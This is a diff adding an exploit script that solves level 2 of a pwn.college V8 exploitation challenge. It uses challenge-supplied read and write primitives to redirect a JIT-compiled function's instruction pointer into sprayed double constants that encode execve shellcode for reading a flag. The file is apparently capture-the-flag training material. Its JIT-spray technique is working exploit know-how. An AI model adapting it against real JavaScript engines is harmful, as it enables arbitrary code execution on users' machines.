Level 2 of PwnCollegeV8Exploitation

JavaScript/PwnCollegeV8Exploitation/Level2/Exploit.js

@@ -0,0 +1,45 @@
+// Integrated Builtin:
+// - int32 GetAddressOf(obj);
+// - int32 ArbRead32(int32 cage_addr);
+// - void ArbWrite32(int32 cage_addr, int32 value);
+
+// To execute shellcode, we need JIT spray instead of writing RWX segment.
+// Because we cannot write in the 64-bit address space.
+
+// RWXAddr: Function -> code(+0xC) -> instruction_start(+0x14)
+// JIT Spray Double Constant Offset: RWXAddr + 0x6B
+
+function shellcode() {
+    // JIT spray machine code form of `execve("catflag", NULL, NULL)`
+    return [
+        1.9995716422075807e-246,
+        1.9710255944286777e-246,
+        1.97118242283721e-246,
+        1.971136949489835e-246,
+        1.9711826272869888e-246,
+        1.9711829003383248e-246,
+        -9.254983612527998e+61
+    ];
+}
+for (let i = 0; i < 100000; i++) shellcode(); // Trigger MAGLEV compilation
+
+function unptr(v) {
+    return v & 0xfffffffe;
+}
+
+function ptr(v) {
+    return v | 1;
+}
+
+let shellcode_addr = GetAddressOf(shellcode);
+console.log("Address of shellcode: " + shellcode_addr.toString(16));
+let code_addr = unptr(ArbRead32(shellcode_addr + 0xC));
+console.log("Address of code: " + code_addr.toString(16));
+let instruction_start_addr = code_addr + 0x14;
+let instruction_start = ArbRead32(instruction_start_addr);
+console.log("instruction_start: " + instruction_start.toString(16));
+ArbWrite32(instruction_start_addr, instruction_start + 0x6B);
+shellcode();
+
+// %DebugPrint(shellcode);
+// %SystemBreak();